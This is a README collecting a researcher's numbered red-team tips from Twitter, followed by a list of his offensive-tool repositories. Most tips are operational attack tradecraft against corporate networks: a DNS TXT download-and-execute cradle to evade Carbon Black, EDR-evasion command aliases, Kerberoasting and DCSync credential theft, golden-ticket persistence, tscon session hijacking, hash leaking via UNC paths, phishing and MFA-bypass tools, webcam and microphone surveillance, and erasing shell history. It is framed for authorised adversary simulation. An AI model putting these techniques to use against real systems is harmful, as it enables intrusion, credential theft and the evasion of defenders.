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Red Team Tips as posted by @vysecurity on Twitter


No longer being updated, please refer to https://vincentyiu.co.uk for red team tips :)


The following tips were posted by @vysecurity on Twitter


The following information should not be used for malicious purposes or intent

Red Team Tips by @vysecurity on Twitter

Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.

Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.

Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.

Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.

Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.

Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell

Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.

Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!

Red tip #9: When PowerUp yields no results, dont forget SysInternalss AutoRuns. Often you can find unexpected surprises :)

Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.

Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.

Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat

Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away

Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.

Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.

Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organisation.

Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally

Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks

Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)

Red tip #20: So apparently not many people use SSH for redirector setup. So try out SSH c2 -R *:80:localhost:80. SSH config GatewayPorts yes

Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.

Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.

Red tip #23: Stash payloads in C:$Recycle.Bin

Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats

Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.

Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defence.

Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.

Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!

Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?

Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi :)

Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.

Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.

Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.

Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.

Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan

Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough

Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA

Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA

Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.

Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.

Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1

Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!

Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings

Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.

Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)

Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.

Red tip #47: Incase EDR are looking for "net users /domain" try using "net use /dom"

Red tip #48: Is EDR potentially looking for "powershell -encodedcommand"? Try "powershell -ec"

Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system

Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell "powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]"

Red tip #51: Cant open C drive? Try \\c$

Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \targetip\ipc$ password /u:domain\username then sc to psexec

Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/

Red tip #54: Hide from blue. Volume shadow copy then execute \?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC

Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.

Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!

Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping

Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"

Red tip #59: Checking whether a server or host is good for egress? Likely to go down? "systeminfo | findstr /i boot"

Red tip #60: Type "query user" to see who else is connected to the machine.

Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.

Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up

Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP

Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share . Then start z:

Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt

Red tip #67: Use vssadmin to list and create volume shadow copies

Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom

Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt

Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times

Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon /dest:" then use putty session

Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.

Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo

Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object

Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed

Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats

Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast

Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks

Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon

Red tip #80: Need to sweep for uptimes? Use wmic /node:"" OS get LastBootUpTime in a for loop

Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief :) then look at RT #82

Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief

Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session.

Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe

Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.

Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating.

Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/

Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.

Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for "script" case sensitive and "<registration" case insensitive.

Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only but not

Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees

Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1

Red tip #93: Use Empyre to generate Macintosh and Linux payloads, modify it to contain code for Windows too! https://github.com/EmpireProject/EmPyre

Red tip #94: Client uses VDIs? Compromise underlying host and use Citrix Shadow Taskbar to spy on VDI sessions by selecting username

Red tip #95: @domchell recommends avoiding non persistent VDIs and persist on laptops. Query DC for live laptops.

Red tip #96: @lucasgates recommends using OLE objects containing VBS scripts instead of Macros as less suspicious. VBE will work too

Red tip #97: Use recent critical vulnerabilities such as CVE-2017-0199 HTA handler issue to simulate real threats. https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/

Red tip #98: @0x09AL suggests WordSteal. You can embed an IMAGE with UNC path to steal hashes from Word. Wont work if proxy. https://github.com/0x09AL/WordSteal

Red tip #99: If client is using Proxy with WebDav you can phish creds using @ryHanson Phishery https://github.com/ryhanson/phishery

Red tip #100: Use wgsidav if you need a quick WebDav server :) https://github.com/mar10/wsgidav

Red tip #101: Set up red team infrastructure following @bluscreenofjeff guidelines! https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki

Red tip #102: Easier DNS redirector! https://pastebin.com/LNj4zjFs for opsec and not hosting C2 on the cloud

Red tip #103: Red team tips are useful but what makes the good red teamer is experience. Rack up that breadth of experience

Red tip #104: SessionGopher does a decent job at retrieving putty and RDP history - https://github.com/fireeye/SessionGopher

Red tip #105: If ping works, try ICMP tunnelling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature network

Red tip #106: Wordlists? https://github.com/berzerk0/Probable-WordlistsI like to use the top probable 297 million list with Deadhobo rules

Red tip #107: More of a pentest tip but nslookup http://google.com if it resolves you may have a DNS tunnelling problem.

Red tip #108: Post exploitation Asset Discovery https://github.com/vysec/Invoke-DNSDiscovery looks for assets by name that might be good if youre low priv user.

Red tip #109: Use Invoke-ProcessScan to give some running processes context on a system. This uses EQGRP leaked list- https://github.com/vysec/Invoke-ProcessScan

Red tip #110: Mature blue? Be careful and minidump lssas.exe then download it and parse locally

Red tip #111: Found an exploitable S4U condition? Use Mistique to attack! https://github.com/machosec/Mystique/blob/master/Mystique.ps1

Red tip #112: Need to use VNC as RDP in use? https://github.com/artkond/Invoke-Vnc has been pretty stable for me. Run it then pivot in and connect!

Red tip #113: Found super secret.doc or master password database.xlsx? Use office2john to get hash and crack in Hashcat!

Red tip #114: PowerUp didnt work and you want to autoruns? Dont bother going on disk, use Invoke-AutoRuns to csv- https://github.com/p0w3rsh3ll/AutoRuns

Red tip #115: Need to zip up a directory quickly for easy exfiltration? Eg. Home shares https://github.com/thoemmi/7Zip4Powershell use Powershell

Red tip #116: Use CatMyFish to search for categorised domains that could be used in your engagements - https://github.com/Mr-Un1k0d3r/CatMyFish

Red tip #117: Ran Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph - https://github.com/sixdub/DomainTrustExplorer

Red tip #118: FOCA finds some useful information for OSINT and intelligence phases. https://www.elevenpaths.com/labstools/foca/index.html

Red tip #119: GoPhish is a pretty useful tool for spinning up simple phishing campaigns especially for decoys https://getgophish.com

Red tip #120: If you have write access to the orgs shared Office template folders You can privesc by backdooring these trusted documents.

Red tip #121: @zwned uses netsh packet tracing to sniff natively from victim host. Save capture and analyze offline!

Red tip #122: More decoy tips! Scan the external perimeter with tools like Nessus and OpenVAS. More traffic the better just to burn the blue

Red tip #123: Read Sean Metcalfa blog http://adsecurity.org/ When AD is used in many environments, it vital to at least know techniques

Red tip #124: Remember you can generate a golden ticket offline with knowledge of krbtgt and rest offline. Golden ticket gets silver from DC

Red tip #125: Got krbtgt of a child domain? Forest parent trusts you? Use the SID history attack in golden tickets to escalate to Ent Admin

Red tip #126: You dont necessarily need Domain Admin, if you have an account that has "Replicating directory changes", dcsync to pull hash

Red tip #127: Planning to use secretsdump.py? :) Try using the DC machine account to authenticate and dump instead of a user! Save hash

Red tip #128: Use machine account hashes to generate silver tickets to a host for persistence. Save machine hash for DC incase krbtgt rotate

Red tip #129: Use PEAS to query shares and emails if using ActiveSync - https://github.com/mwrlabs/peas

Red tip #130: (Not red really but useful) Sort IPs: cat IPs.txt | sort -t . -k1,1 -k2,2 -k3,3 -k4,4

Red tip #131: Learn AWK and general bash scripting. Processing and merging of data sets speeds up our job for discovery and time keeping.

Red tip #132: Worth learning to pick locks and the dust can sensor trick if youre going to do some physical. http://www.artofmanliness.com/2014/11/19/how-to-pick-a-lock-pin-tumbler-locks/

Red tip #133: Grep has an extract flag -o that can be used to extract from a regex. Good for extracting data from massive blobs.

Red tip #134: Victims use wireless? Use KARMA attack to force them onto your network. Use eternalblue, domain creds or other vulns to get in. https://github.com/sensepost/mana

Red tip #135: Phishing pages are usually custom. However its always good to have a stash for decoys. Generic Gmail, Office365?

Red tip #136: Keep up to date by watching presentations from conferences on YouTube :) Discover useful techniques

Red tip #137: If youve exhausted all payload types, try sending a Mac user a python one liner and Win PS 1 liner. Ive had people run it.

Red tip #139: If you need to get a clean EXE for file drop and exec, try out @midnite_runr Backdoor Factory - https://github.com/secretsquirrel/the-backdoor-factory

Red tip #140: If enemy does not use proxy with TLS inspection then you can use https://www.mdsec.co.uk/2017/02/domain-fronting-via-cloudfront-alternate-domains/ to mask your c2 channel further

Red tip #141: On a Linux box and want to egress from it over a proxy? Use ProxyTunnel to pipe SSH - https://github.com/proxytunnel/proxytunnel

Red tip #142: Need some OSINT? Keep Spiderfoot running long term to accompany your manual OSINT sources http://www.spiderfoot.net

Red tip #143: OSINTing? TheHarvester does a decent job at subdomains. Though theres better ways to get emails bulk. https://github.com/laramies/theHarvester

Red tip #144: Exploring and want to use WMI? https://www.microsoft.com/en-us/download/details.aspx?id=8572 is pretty useful for exploring the different namespaces and classes.

Red tip #145: Need to reset a password? Do it then quickly dcsync for previous password hash and use NTLMinject - https://github.com/vletoux/NTLMInjector

Red tip #146: IDS flagging known payload binary blob? Base64 encode it in your payload and use certutil, PS or VB to decode it!

Red tip #147: Test your phishing campaigns before sending!!!

Red tip #148: If youre sending into Exchange, make sure your SMTP server is not in SPAM list or black lists. Check junk mails mail headers

Red tip #149: Use Microsofts Message Header Analyzer to parse and review email headers from Outlook. https://testconnectivity.microsoft.com/MHA/Pages/mha.aspx

Red tip #150: Make sure phishing emails Bounce header matches From. Or else some will flag as malicious.

Red tip #151: DomainHunter also looks for good candidate expired domains - https://github.com/minisllc/domainhunter

Red tip #152: Want to scrape MetaData in CLI? Use PowerMeta. Linux users can use PowerShell too! https://github.com/dafthack/PowerMeta

Red tip #153: RDP in use? Dont want to use VNC? Try mimikatzs ts::multirdp in memory patch by @gentilkiwi

Red tip #154: Admin on a machine with VPN client? certificate extraction using Mimikatz by @gentilkiwi. Dont forget to dl configs. Backdoor

Red tip #155: Master all the quick wins to Domain privilege escalation. When youre pressured to get DA in 15 mins, you want to know you can

Red tip #156: @Akijos notes that we should be careful when using silver tickets with scheduled tasks. Author is the user account youre on.

Red tip #157: If you dont need a golden ticket, dont generate it.

Red tip #158: Scan a DNS server for Alexa top 1 million spoofable domains :) Ive got a massive list, do you?

Red tip #159: Scan the internet for a list of domain frontable domains! Ive got a big big list ready for whenever I want to use them :)

Red tip #160: We all know people share credentials between different services. Try these credentials on other accounts owned by the user!

Red tip #161: Cant crack a password? Try the users previous passwords from history in AD. They may follow a pattern.

Red tip #162: Cant crack a hash owned by a user? Take all previously discovered passwords from their files and generate a new word list.

Red tip #163: Cant crack a password? Make sure these are in your word list: name of company, town, capital, country, months! Appear a lot.

Red tip #164: Didier Stevens has SelectMyParent tool that lets you spawn a child process with an arbitrary parent. https://blog.didierstevens.com/2017/03/20/that-is-not-my-child-process/

Red tip #165: Using SelectMyParent stops those detections eg. powershell.exe spawning cmd.exe. @armitagehackers CobaltStrike has ppid cmd!

Red tip #166: Use PowerPoint mouse over text to invoke a powershell command one liner. #adversarysimulation - https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/

Red tip #167: Follow @mattifestation to keep up to date with blue team advances. Just in case blue is actually up to date with mitigations!

Red tip #168: Using VBS or JS? Cant stage using PowerShell.exe as blocked? @Cneelis released https://github.com/Cn33liz/StarFighters so you can keep use PS

Red tip #169: Not sure who uses Wi-Fi webcams but go run a mass deauth attack if youre going to plan on breaking in physically to discon

Red tip #170: @malcomvetter Never use defaults - run Mimikatz with AES and 8 hour tickets to avoid passive detection from NG defense tools!

Red tip #171: Win XP doesnt have PowerShell? Try using Unmanaged powershell to keep using your favourite scripts!

Red tip #172: @anthonykasza tells us that the at.exe command takes base64 encoded Params! Eg. at.exe b64::[encoded params]

Red tip #173: Grab cleartext wireless keys: netsh wlan show profile name="ssid" key=clear

Red tip #174: Got a shell on a victim without admin? Want their creds? Try Inveigh then rpcping -s -t ncacn_np to leak hash.

Red tip #175: Got a low priv shell and need creds? Use Invoke-LoginPrompt by @enigma0x3 https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1

Red tip #176: Get access to shadow admin accounts, they can DCsync and are essentially DA. https://www.cyberark.com/threat-research-blog/shadow-admins-stealthy-accounts-fear/

Red tip #177: If blue detects PTH. Try extract Kerberos tickets and PTT.

Red tip #178: @lefterispan wrote https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 … which sets up a proxy and forces an auth attempt to it to leak hash. Low priv leak.

Red tip #179: When creating phishing pages, try cloning and modifying parts of the client’s own webpages. For example of their VPN login!

Red tip #180: Regardless of whether there are known defences. Run your PS scripts through Obfuscation before loading into memory.

Red tip #181: Stuck trying to find those assets still? Try @424f424f Get-BrowserData https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1

Red tip #182: Follow @JohnLaTwC as he tweets phishing examples and sometimes with new techniques used in Wild. Good for adversary simulation

Red tip #183: @MrUn1k0d3r released https://github.com/Mr-Un1k0d3r/SCT-obfuscator … can probably bypass Gateway signatures when performing SCT delivery for regsvr32! https://github.com/Mr-Un1k0d3r/SCT-obfuscator

Red tip #184: We always talk about Windows and AD. But now let’s have a look at Linux and AD with https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9

Red tip #185: Use WSUS for lateral movement https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1

Red tip #186: View @jpcert https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf … and look at all those indicators and artefacts left behind. Then hexedit those tools 👍

Red tip #187: Found a portal using 2FA? Using RSA SecureID? https://blog.netspi.com/targeting-rsa-emergency-access-tokencodes-fun-profit/ … Pin bruteforce!

Red tip #188: @pwnagelabs says to avoid bash history on exit using: kill -9 $$

Red tip #189: @pwnagelabs teaches us how to avoid wtmp logging with: ssh -l user target -T

Red tip #190: @bluscreenofjeff shows us how to use Apache Mod rewrite to randomly serve different payloads https://bluescreenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite/

Red tip #191: Domain user? Query LDAP for Printers. Attempt default creds or known vulns then read Service account creds, hash or relay

Red tip #192: Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-CSV -not dns.csv

Red tip #193: Password protected doc in email? For some reason a lot of people send the password separately to the same inbox. #epicfail

Red tip #194: Can’t see another part of the network and there’s a DC? Pivot off the DC :)

Red tip #195: C:\windows\system32\inetsrv\appcmd list site to find IIS bindings.

Red tip #196: DA -> Locate DB -> Found MSSQL? https://github.com/NetSPI/PowerUpSQL use PowerUpSQL to enumerate and privesc by stealing tokens.

Red tip #197: If ACL doesn’t let you read other users’ home shares, you can try net view \fileserv /all to try other shares and folders!

Red tip #198: Username jondoe and jondoe-x? Ones an Admin? Try same password. May be shared 😎 repeat for entire user list.

Red tip #199: Failed to phish? Payloads failing? Mac users? Write an email and ask them to open terminal and paste in python Empyre one line

Red tip #200: @_wald0 blessed us with this BH cypher query to skip specific nodes to look for other paths. https://pastebin.com/qAzH9uji

Red tip #201: @424f424f pushed some research into LNK files inside CAB can be used to bypass the Attachment Manager 👍http://www.rvrsh3ll.net/blog/informational/bypassing-windows-attachment-manager/

Red tip #202: When domain fronting, your calls hit the edge node, so every domain you use potentially hits a different a IP! 😎

Red tip #203: If using @Cneelis StarFighter. Instead of using a staged web delivery, just stick while stageless payload as encoded block in!

Red tip #204: Printers are often good MAC addresses to use to beat NAC when physical red teaming as printers (mostly?) don’t support 802.1x

Red tip #205: If proxy is blocking SCT file, replace with and add around the rest. Thx @subTee

Red tip #206: CobaltStrike's @armitagehacker VNC not working? Here's a workaround using @artkond Invoke-VNC https://github.com/vysec/Aggressor-VYSEC/blob/master/vnc-psh.cna

Red tip #207: Got C2 on Windows user but no credentials? Leak a hash using @leftp's code. Implemented into CNA https://github.com/vysec/Aggressor-VYSEC/blob/master/Invoke-CredLeak.ps1

Red tip #208: @Nebulator spoke on IP regex by IR at #SnoopCon. Here's CobaltStrike @armitagehacker CNA to automate https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna

Red tip #209: Automate environment prepping and spawn all processes as a child of explorer.exe by @armitagehacker https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna

Red tip #210: @subTee highlighted to us that XML requests can be used as a download cradle in constrained language mode!

Red tip #211: Check out @armitagehacker's post on OPSEC considerations when using Cobalt Strike's beacon. https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/

Red tip #212: Reset AD passwords from Linux with @mubix https://room362.com/post/2017/reset-ad-user-password-with-linux/ :) proxychains it over your pivot :D

Red tip #213: Got a NetNTLMv1 hash? Convert it to NTLM by cracking three DES keys: https://hashcat.net/forum/thread-5912.html

Red tip #214: If you don’t 100 percent understand NETNTLMv1 and v2 read up on https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/

Red tip #215: If you don’t know how LM and NTLM hashing works... go back to basics with https://blog.smallsec.ca/2016/11/07/windows-credentials/

Red tip #216: @424f424f just made me aware that FireEye can prevent runas from executing. Use unmanaged PS to spawn https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1

Red tip #217: S4U can be used to delegate across SPN. So if you have msds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFS

Red tip #218: You’re in a subnet where people RDP into but you can’t attack outwards? Set backdoor over tsclient on start keys. 😎

Red tip #219: Unsure what the localised admin account might be called or need to copy and paste? Check out https://social.technet.microsoft.com/wiki/contents/articles/13813.localized-names-for-administrator-account-in-windows.aspx

Red tip #220: EDR monitoring “whoami”? Use echo %userprofile%; echo %username%. Or replace echo with anything that reflects error: ie. set

Red tip #221: Network segregation in play? Try Get-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)

Red tip #222: If you want to simulate MBR activity like #Petya, check out https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1

Red tip #223: Secure your beach heads against #Petya WMIC /node:host process call create “echo > C:\windows\perfc”

Red tip #224: Using Linux? Modify /etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.

Red tip #225: Stuck in a heavily segregated situation on a server? Try RDPInception attack vector out https://www.mdsec.co.uk/2017/06/rdpinception/

Red tip #226: Reduce AV detection by using fake Microsoft certificate.

Red tip #227: Not using notifications yet for C2 events? For @armitagehacker's Cobalt Strike check out

More Repositories



LinkedIn Recon Tool


A tool to link a domain with registered organisation names and emails, to other domains.


A list of Domain Frontable Domains by CDN


morphHTA - Morphing Cobalt Strike's evil.HTA


Bloodhound Attack Path Automation in CobaltStrike


IPFuscator - A tool to automatically generate alternative IP representations




CVE-2017-8759 - A vulnerability in the SOAP WDSL parser.


Obfuscated Penetration Testing PowerShell scripts


Generates anti-sandbox analysis HTA files without payloads


Aggressor Script to launch IE driveby for CVE-2018-4878


checkO365 is a tool to check if a target domain is using O365


Splunk Dashboard for CobaltStrike logs


Repository for my ATT&CK analysis research.


F# Implementation to spawn shellcode


Gives context to a system. Uses EQGRP shadow broker leaked list to give some descriptions to processes.


A script that can be deployed to Azure App for C2 / Proxy / Redirector


Basic Auth Phish page


A collection of shell code conversion scripts that I have written over time for repetitive tasks


A script to attack users who are RDPing into a machine and recurse this attack. For security testers and attack simulations.


Office365 Tenants List


CobaltStrike Aggressor Script to utilise FuzzySec's Windows Notification Framework Research to Spawn a Shell under Explorer.exe




DNS over HTTPS Servers


Bad Security Vendor IPs


A generator to weaponize Macro payloads that can evade EMET and utilises native VB migration.




Easily connect to a VPN in a country of your choice


Tenants list for each cloud service.


CVE-2020-0796 - Working PoC - 20200313




A cap/pcap packet parser to make life easier when performing stealth/passive reconnaissance.


Create COM Objects backed by Scripts, not DLLs






A Python Script that controls Selenium to automate the process of connecting on LinkedIn




Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.












A list of Domain Fronting Proxies that are known to permit or break Domain Fronting